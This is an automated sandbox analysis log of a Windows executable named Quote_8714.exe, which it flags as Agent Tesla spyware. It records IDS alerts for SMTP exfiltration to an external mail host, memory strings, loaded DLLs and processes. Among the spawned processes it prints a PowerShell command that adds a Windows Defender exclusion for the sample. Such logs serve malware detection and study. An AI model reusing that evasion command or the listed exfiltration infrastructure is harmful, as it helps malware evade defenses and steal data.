                        Source: Network trafficSuricata IDS: 2839723 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla SMTP Activity : 192.168.2.4:49735 -> 199.79.62.115:587
                        Source: Network trafficSuricata IDS: 2840032 - Severity 1 - ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 : 192.168.2.4:49735 -> 199.79.62.115:587
                        Source: global trafficTCP traffic: 192.168.2.4:49735 -> 199.79.62.115:587
                        Source: Joe Sandbox ViewIP Address: 199.79.62.115 199.79.62.115
                        Source: global trafficTCP traffic: 192.168.2.4:49735 -> 199.79.62.115:587
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: global trafficDNS traffic detected: DNS query: mail.mbarieservicesltd.com
                        Source: Quote_8714.exe, 00000005.00000002.2942693861.0000000002ADA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.mbarieservicesltd.com
                        Source: Quote_8714.exe, 00000000.00000002.1747563591.0000000002A90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: Quote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                        Source: Quote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                        Source: Quote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                        Source: Quote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                        Source: Quote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                        Source: Quote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                        Source: Quote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                        Source: Quote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                        Source: Quote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                        Source: Quote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                        Source: Quote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                        Source: Quote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                        Source: Quote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                        Source: Quote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                        Source: Quote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                        Source: Quote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                        Source: Quote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                        Source: Quote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                        Source: Quote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                        Source: Quote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                        Source: Quote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                        Source: Quote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                        Source: Quote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                        Source: Quote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                        Source: Quote_8714.exe, 00000000.00000002.1753617795.0000000006C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                        Source: C:\Users\user\Desktop\Quote_8714.exeCode function: 0_2_0106DD140_2_0106DD14
                        Source: C:\Users\user\Desktop\Quote_8714.exeCode function: 0_2_04F276C80_2_04F276C8
                        Source: C:\Users\user\Desktop\Quote_8714.exeCode function: 0_2_04F200400_2_04F20040
                        Source: C:\Users\user\Desktop\Quote_8714.exeCode function: 0_2_04F2F5430_2_04F2F543
                        Source: C:\Users\user\Desktop\Quote_8714.exeCode function: 0_2_04F2F53F0_2_04F2F53F
                        Source: C:\Users\user\Desktop\Quote_8714.exeCode function: 0_2_04F276B80_2_04F276B8
                        Source: C:\Users\user\Desktop\Quote_8714.exeCode function: 0_2_04F25A520_2_04F25A52
                        Source: C:\Users\user\Desktop\Quote_8714.exeCode function: 0_2_04FFE1900_2_04FFE190
                        Source: C:\Users\user\Desktop\Quote_8714.exeCode function: 0_2_07236E470_2_07236E47
                        Source: C:\Users\user\Desktop\Quote_8714.exeCode function: 0_2_0723A6680_2_0723A668
                        Source: C:\Users\user\Desktop\Quote_8714.exeCode function: 0_2_0723BF600_2_0723BF60
                        Source: C:\Users\user\Desktop\Quote_8714.exeCode function: 0_2_07239DF80_2_07239DF8
                        Source: C:\Users\user\Desktop\Quote_8714.exeCode function: 0_2_0723C8700_2_0723C870
                        Source: C:\Users\user\Desktop\Quote_8714.exeCode function: 0_2_0B2600400_2_0B260040
                        Source: C:\Users\user\Desktop\Quote_8714.exeCode function: 0_2_0B2676100_2_0B267610
                        Source: C:\Users\user\Desktop\Quote_8714.exeCode function: 0_2_0B2600400_2_0B260040
                        Source: C:\Users\user\Desktop\Quote_8714.exeCode function: 0_2_0BCA58C00_2_0BCA58C0
                        Source: C:\Users\user\Desktop\Quote_8714.exeCode function: 0_2_0BCAD8B00_2_0BCAD8B0
                        Source: C:\Users\user\Desktop\Quote_8714.exeCode function: 0_2_0BCAD8B00_2_0BCAD8B0
                        Source: C:\Users\user\Desktop\Quote_8714.exeCode function: 0_2_0BCA86B80_2_0BCA86B8
                        Source: C:\Users\user\Desktop\Quote_8714.exeCode function: 0_2_0BCAE51F0_2_0BCAE51F
                        Source: C:\Users\user\Desktop\Quote_8714.exeCode function: 5_2_00CA41405_2_00CA4140
                        Source: C:\Users\user\Desktop\Quote_8714.exeCode function: 5_2_00CACD4C5_2_00CACD4C
                        Source: C:\Users\user\Desktop\Quote_8714.exeCode function: 5_2_00CA4D585_2_00CA4D58
                        Source: C:\Users\user\Desktop\Quote_8714.exeCode function: 5_2_00CADE405_2_00CADE40
                        Source: C:\Users\user\Desktop\Quote_8714.exeCode function: 5_2_00CA44885_2_00CA4488
                        Source: C:\Users\user\Desktop\Quote_8714.exeCode function: 5_2_063139005_2_06313900
                        Source: C:\Users\user\Desktop\Quote_8714.exeCode function: 5_2_063117285_2_06311728
                        Source: C:\Users\user\Desktop\Quote_8714.exeCode function: 5_2_0632DD205_2_0632DD20
                        Source: C:\Users\user\Desktop\Quote_8714.exeCode function: 5_2_063200405_2_06320040
                        Source: C:\Users\user\Desktop\Quote_8714.exeCode function: 5_2_0632E8F85_2_0632E8F8
                        Source: C:\Users\user\Desktop\Quote_8714.exeCode function: 5_2_063238E85_2_063238E8
                        Source: C:\Users\user\Desktop\Quote_8714.exeCode function: 5_2_0632BED05_2_0632BED0
                        Source: C:\Users\user\Desktop\Quote_8714.exeCode function: 5_2_063248905_2_06324890
                        Source: Quote_8714.exe, 00000000.00000002.1747563591.0000000002AC3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename7b99aba2-3c62-4861-97de-170caa2c3039.exe4 vs Quote_8714.exe
                        Source: Quote_8714.exe, 00000000.00000002.1756123538.00000000076D0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Quote_8714.exe
                        Source: Quote_8714.exe, 00000000.00000002.1752690592.0000000005420000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs Quote_8714.exe
                        Source: Quote_8714.exe, 00000000.00000002.1749716667.0000000003A59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename7b99aba2-3c62-4861-97de-170caa2c3039.exe4 vs Quote_8714.exe
                        Source: Quote_8714.exe, 00000000.00000002.1749716667.0000000003A59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs Quote_8714.exe
                        Source: Quote_8714.exe, 00000000.00000002.1749716667.0000000003A59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Quote_8714.exe
                        Source: Quote_8714.exe, 00000000.00000002.1747563591.0000000002A90000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemscorlib.dllT vs Quote_8714.exe
                        Source: Quote_8714.exe, 00000000.00000002.1747563591.0000000002A90000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs Quote_8714.exe
                        Source: Quote_8714.exe, 00000000.00000002.1747563591.0000000002A90000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q,\\StringFileInfo\\040904B0\\OriginalFilename vs Quote_8714.exe
                        Source: Quote_8714.exe, 00000000.00000002.1747563591.0000000002A90000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameROItv.exe" vs Quote_8714.exe
                        Source: Quote_8714.exe, 00000000.00000002.1747563591.0000000002A90000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q,\\StringFileInfo\\000004B0\\OriginalFilename vs Quote_8714.exe
                        Source: Quote_8714.exe, 00000000.00000002.1747563591.0000000002A90000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Windows.Forms.dllT vs Quote_8714.exe
                        Source: Quote_8714.exe, 00000000.00000002.1747563591.0000000002A90000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.dllT vs Quote_8714.exe
                        Source: Quote_8714.exe, 00000000.00000002.1747563591.0000000002A90000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Drawing.dllT vs Quote_8714.exe
                        Source: Quote_8714.exe, 00000000.00000002.1747563591.0000000002A90000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Configuration.dllT vs Quote_8714.exe
                        Source: Quote_8714.exe, 00000000.00000002.1747563591.0000000002A90000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Core.dllT vs Quote_8714.exe
                        Source: Quote_8714.exe, 00000000.00000002.1747563591.0000000002A90000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Xml.dllT vs Quote_8714.exe
                        Source: Quote_8714.exe, 00000000.00000002.1747563591.0000000002A90000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Quote_8714.exe
                        Source: Quote_8714.exe, 00000000.00000002.1747563591.0000000002A90000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.VisualBasic.DLLT vs Quote_8714.exe
                        Source: Quote_8714.exe, 00000000.00000002.1745088291.0000000000C6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Quote_8714.exe
                        Source: Quote_8714.exe, 00000000.00000000.1691782225.00000000005F2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameROItv.exe" vs Quote_8714.exe
                        Source: Quote_8714.exe, 00000005.00000002.2940203488.000000000042C000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilename7b99aba2-3c62-4861-97de-170caa2c3039.exe4 vs Quote_8714.exe
                        Source: Quote_8714.exe, 00000005.00000002.2940435451.00000000007F9000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Quote_8714.exe
                        Source: Quote_8714.exe, 00000005.00000002.2941132727.0000000000CB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Quote_8714.exe
                        Source: Quote_8714.exeBinary or memory string: OriginalFilenameROItv.exe" vs Quote_8714.exe
                        Source: Quote_8714.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: Quote_8714.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack, O.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack, O.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack, P.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack, P.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack, N.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack, N.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack, N.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpack, N.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.Quote_8714.exe.76d0000.7.raw.unpack, y8LkSCvYhQSRsrhllZ.csSecurity API names: _0020.SetAccessControl
                        Source: 0.2.Quote_8714.exe.76d0000.7.raw.unpack, y8LkSCvYhQSRsrhllZ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.Quote_8714.exe.76d0000.7.raw.unpack, y8LkSCvYhQSRsrhllZ.csSecurity API names: _0020.AddAccessRule
                        Source: 0.2.Quote_8714.exe.76d0000.7.raw.unpack, kx3wCBOTkFcMnULZwX.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.Quote_8714.exe.3c7a008.5.raw.unpack, kx3wCBOTkFcMnULZwX.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.Quote_8714.exe.3c7a008.5.raw.unpack, y8LkSCvYhQSRsrhllZ.csSecurity API names: _0020.SetAccessControl
                        Source: 0.2.Quote_8714.exe.3c7a008.5.raw.unpack, y8LkSCvYhQSRsrhllZ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.Quote_8714.exe.3c7a008.5.raw.unpack, y8LkSCvYhQSRsrhllZ.csSecurity API names: _0020.AddAccessRule
                        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/6@3/1
                        Source: C:\Users\user\Desktop\Quote_8714.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Quote_8714.exe.logJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5252:120:WilError_03
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ysu0wl3r.bhc.ps1Jump to behavior
                        Source: Quote_8714.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: Quote_8714.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                        Source: C:\Users\user\Desktop\Quote_8714.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Users\user\Desktop\Quote_8714.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\Desktop\Quote_8714.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: Quote_8714.exeReversingLabs: Detection: 36%
                        Source: Quote_8714.exeVirustotal: Detection: 47%
                        Source: C:\Users\user\Desktop\Quote_8714.exeFile read: C:\Users\user\Desktop\Quote_8714.exeJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\Quote_8714.exe "C:\Users\user\Desktop\Quote_8714.exe"
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quote_8714.exe"
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess created: C:\Users\user\Desktop\Quote_8714.exe "C:\Users\user\Desktop\Quote_8714.exe"
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quote_8714.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess created: C:\Users\user\Desktop\Quote_8714.exe "C:\Users\user\Desktop\Quote_8714.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeSection loaded: dwrite.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeSection loaded: windowscodecs.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeSection loaded: iconcodecservice.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeSection loaded: textshaping.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeSection loaded: textinputframework.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeSection loaded: coreuicomponents.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeSection loaded: wldp.dllJump to behavior
